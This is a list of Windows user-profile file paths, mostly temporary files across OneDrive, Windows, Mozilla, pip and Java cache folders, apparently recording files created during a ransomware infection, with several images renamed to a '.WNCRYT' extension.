C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\bs-latn-ba\~SDEECD.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ca\~SDEF3B.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ca-es-valencia\~SDEF6B.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\cs\~SDEFCA.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\cy-gb\~SDEFFA.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\da\~SDF0A7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\de\~SDF0E6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\el\~SDF126.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\en\~SDF156.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\en-gb\~SDF1A5.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\es\~SDF1E4.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\et\~SDF214.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\eu\~SDF273.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fa\~SDF2E1.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fi\~SDF311.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fil-ph\~SDF341.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\fr\~SDF361.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ga-ie\~SDF362.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gd\~SDF363.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gd-latn\~SDF364.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gl\~SDF365.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\gu\~SDF366.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ha-latn-ng\~SDF377.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\he\~SDF3B6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hi\~SDF3F6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hr\~SDF407.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hu\~SDF446.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\hy\~SDF495.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\id\~SDF4C5.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ig-ng\~SDF533.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\imageformats\~SDF5B1.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\~SDF63F.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\is\~SDF68E.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\it\~SDF6DD.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ja\~SDF70D.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ka\~SDF75C.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\kk\~SDF79C.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\km-kh\~SDF7DB.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\kn\~SDF82A.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ko\~SDF86A.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\kok\~SDF8A9.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ku-arab\~SDF8D9.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ky\~SDF8FA.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\lb-lu\~SDF939.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\lt\~SDF979.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\lv\~SDF9A8.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mi-nz\~SDF9D8.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mk\~SDFA37.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ml-in\~SDFA67.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mn\~SDFA97.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mr\~SDFAC7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ms\~SDFAF7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\mt-mt\~SDFB26.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nb-no\~SDFB56.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ne-np\~SDFB86.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nl\~SDFBB6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nn-no\~SDFBC7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\nso-za\~SDFBE7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\or-in\~SDFC36.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pa\~SDFC66.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pa-arab\~SDFCB5.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pa-arab-pk\~SDFCC6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pl\~SDFCE6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\platforms\~SDFCE7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\prs-af\~SDFCE8.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pt-br\~SDFCE9.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\pt-pt\~SDFD28.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\~SDFD68.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\~SDFD88.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls\~SDFDE7.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls\Styles\~SDFE36.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls\Styles\Flat\~SDFE85.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Controls.2\~SDFEC5.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Extras\~SDFF14.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Layouts\~SDFF73.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Templates.2\~SD10.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick\Window.2\~SD30.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qml\QtQuick.2\~SD50.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\qut-latn\~SD9F.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\quz-pe\~SDCF.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ro\~SD10F.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ru\~SD11F.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\rw\~SD16F.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\scenegraph\~SD1CD.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sd-arab\~SD1FD.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sd-arab-pk\~SD23D.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\si-lk\~SD27C.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sk\~SD28D.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sl\~SD28E.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sq\~SD28F.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sr-cyrl-ba\~SD290.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sr-cyrl-rs\~SD291.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sr-latn-rs\~SD2FF.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sv\~SD36E.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\sw\~SD3BD.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ta\~SD3FC.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\te\~SD47A.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tg\~SD49A.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tg-cyrl\~SD4CA.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\th\~SD558.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ti\~SD5C6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tk-tm\~SD615.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tn-za\~SD645.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tr\~SD6A4.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\tt\~SD6F3.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ug\~SD713.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ug-arab\~SD743.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\uk\~SD764.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ur\~SD7A3.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\uz-latn-uz\~SD7E3.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\vi\~SD7F3.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\wo\~SD813.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\xh-za\~SD814.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\yo-ng\~SD854.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\zh-cn\~SD874.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\zh-tw\~SD885.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\zu-za\~SD8A5.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\~SD8B6.tmp
C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\~SD914.tmp
C:\Users\user\AppData\Local\Microsoft\PlayReady\~SD944.tmp
C:\Users\user\AppData\Local\Microsoft\RMSLocalStorage\~SD974.tmp
C:\Users\user\AppData\Local\Microsoft\TaskSchedulerConfig\~SD994.tmp
C:\Users\user\AppData\Local\Microsoft\Vault\~SD9C4.tmp
C:\Users\user\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\~SD9C5.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\~SD9C6.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\1024\~SD9C7.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\1033\~SD9C8.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\AppCache\~SD9C9.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\AppCache\7AI636VW\~SD9CA.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Burn\~SD9DB.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Burn\Burn\~SD9DC.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\~SD9DD.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\~SD9DE.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\GameExplorer\~SD9DF.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\History\~SD9E0.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\~SD9E1.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012024080520240806\~SD9F2.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\History\Low\~SD9F3.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\~SD9F4.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ISE\~SD9F5.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ISE\S-1-5-5-0-122291\~SD9F6.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones\~SD9F7.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\~SD9F8.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\~SDA18.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\main.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Themes\~SDA77.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\~SDA87.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\~SDAC7.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\~SDAF7.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\~SDB26.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\~SDB37.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_3eb5ea8473594499407cacbd9887e2953d50fd80_cab_0a5884df\~SDB57.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_5f6630b0297fd4d8402560a938657f1364116_cab_012098e4\~SDB68.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_7e7688eac2ab845272f4daac96479e93e0f0a5_cab_0ad8a2e7\~SDB88.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_d0c641ef89a8d207056286596bafe75f59844_cab_0a108ee2\~SDBB8.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Live\~SDBD8.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Live\Bici\~SDBD9.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Mail\~SDBEA.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\~SDBEB.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new\~SDC3A.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\~SDC7A.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\ShadesOfBlue.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows Media\~SDEFB.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Media\12.0\~SDEFC.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Sidebar\~SDF6B.tmp
C:\Users\user\AppData\Local\Microsoft\Windows Sidebar\Gadgets\~SDF7B.tmp
C:\Users\user\AppData\Local\Microsoft_Corporation\~SDF9B.tmp
C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\~SDFCB.tmp
C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\~SDFFB.tmp
C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveFiles\~SD102B.tmp
C:\Users\user\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\~SD106B.tmp
C:\Users\user\AppData\Local\Mozilla\~SD108B.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\~SD10DA.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\~SD10DB.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\~SD10DC.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cache2\~SD10ED.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cache2\doomed\~SD114B.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cache2\entries\~SD117B.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\safebrowsing\~SD11DA.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\safebrowsing\google4\~SD1239.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\startupCache\~SD123A.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\thumbnails\~SD1279.tmp
C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\yivbg7nf.default\~SD1299.tmp
C:\Users\user\AppData\Local\Package Cache\~SD12BA.tmp
C:\Users\user\AppData\Local\Package Cache\{85379532-0003-4517-8fc4-6227b410c30c}\~SD12EA.tmp
C:\Users\user\AppData\Local\pip\~SD130A.tmp
C:\Users\user\AppData\Local\pip\cache\~SD1359.tmp
C:\Users\user\AppData\Local\pip\cache\http\~SD136A.tmp
C:\Users\user\AppData\Local\pip\cache\http\4\~SD1399.tmp
C:\Users\user\AppData\Local\pip\cache\http\4\e\~SD13D9.tmp
C:\Users\user\AppData\Local\pip\cache\http\4\e\e\~SD1428.tmp
C:\Users\user\AppData\Local\pip\cache\http\4\e\e\3\~SD1448.tmp
C:\Users\user\AppData\Local\pip\cache\http\4\e\e\3\1\~SD14A7.tmp
C:\Users\user\AppData\Local\pip\cache\http\8\~SD14D7.tmp
C:\Users\user\AppData\Local\pip\cache\http\8\8\~SD14F7.tmp
C:\Users\user\AppData\Local\pip\cache\http\8\8\6\~SD1517.tmp
C:\Users\user\AppData\Local\pip\cache\http\8\8\6\e\~SD1528.tmp
C:\Users\user\AppData\Local\pip\cache\http\8\8\6\e\e\~SD1539.tmp
C:\Users\user\AppData\Local\pip\cache\http\a\~SD1578.tmp
C:\Users\user\AppData\Local\pip\cache\http\a\1\~SD1598.tmp
C:\Users\user\AppData\Local\pip\cache\http\a\1\9\~SD15B9.tmp
C:\Users\user\AppData\Local\pip\cache\http\a\1\9\5\~SD15C9.tmp
C:\Users\user\AppData\Local\pip\cache\http\a\1\9\5\3\~SD15EA.tmp
C:\Users\user\AppData\Local\pip\cache\selfcheck\~SD160A.tmp
C:\Users\user\AppData\LocalLow\~SD163A.tmp
C:\Users\user\AppData\LocalLow\Adobe\~SD165A.tmp
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\~SD1699.tmp
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\~SD16F8.tmp
C:\Users\user\AppData\LocalLow\Adobe\Linguistics\~SD1747.tmp
C:\Users\user\AppData\LocalLow\Microsoft\~SD17A6.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\~SD17E6.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\~SD1883.tmp
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\~SD1910.tmp
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\~SD19BD.tmp
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\~SD19DE.tmp
C:\Users\user\AppData\LocalLow\Microsoft\RMSLocalStorage\~SD1A0D.tmp
C:\Users\user\AppData\LocalLow\Mozilla\~SD1A2E.tmp
C:\Users\user\AppData\LocalLow\Sun\~SD1A7D.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\~SD1A9D.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\~SD1ABD.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\~SD1AED.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\~SD1B6B.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\0\~SD1BBA.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\1\~SD1BDB.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\10\~SD1C39.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\11\~SD1C79.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\12\~SD1CD8.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\13\~SD1CF8.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\14\~SD1D37.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\15\~SD1D67.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\16\~SD1DB6.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\17\~SD1DE6.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\18\~SD1DF7.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\19\~SD1E17.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\2\~SD1E37.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\20\~SD1E67.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\21\~SD1E87.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\22\~SD1ED7.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\23\~SD1EE7.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\24\~SD1F07.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\25\~SD1F28.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\26\~SD1F77.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\27\~SD1FA7.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\28\~SD1FE6.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\29\~SD2035.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\3\~SD2065.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\30\~SD2095.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\31\~SD20B5.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\32\~SD20E5.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\33\~SD2144.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\34\~SD2155.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\35\~SD2175.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\36\~SD21B4.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\37\~SD21E4.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\38\~SD21F5.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\39\~SD2234.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\4\~SD2264.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\40\~SD2284.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\41\~SD2295.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\42\~SD2296.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\43\~SD22E5.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\44\~SD22F6.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\45\~SD2316.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\46\~SD2356.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\47\~SD2376.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\48\~SD2396.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\49\~SD23C6.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\5\~SD2425.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\50\~SD2435.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\51\~SD2456.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\52\~SD24C4.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\53\~SD24C5.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\54\~SD24C6.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\55\~SD2505.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\56\~SD2535.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\57\~SD2556.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\58\~SD2566.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\59\~SD2577.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\6\~SD2587.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\60\~SD25A8.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\61\~SD25C8.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\62\~SD25F8.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\63\~SD2618.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\7\~SD2629.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\8\~SD262A.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\9\~SD262B.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\host\~SD262C.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\muffin\~SD262D.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\log\~SD262E.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\security\~SD263E.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\tmp\~SD263F.tmp
C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\tmp\si\~SD2640.tmp
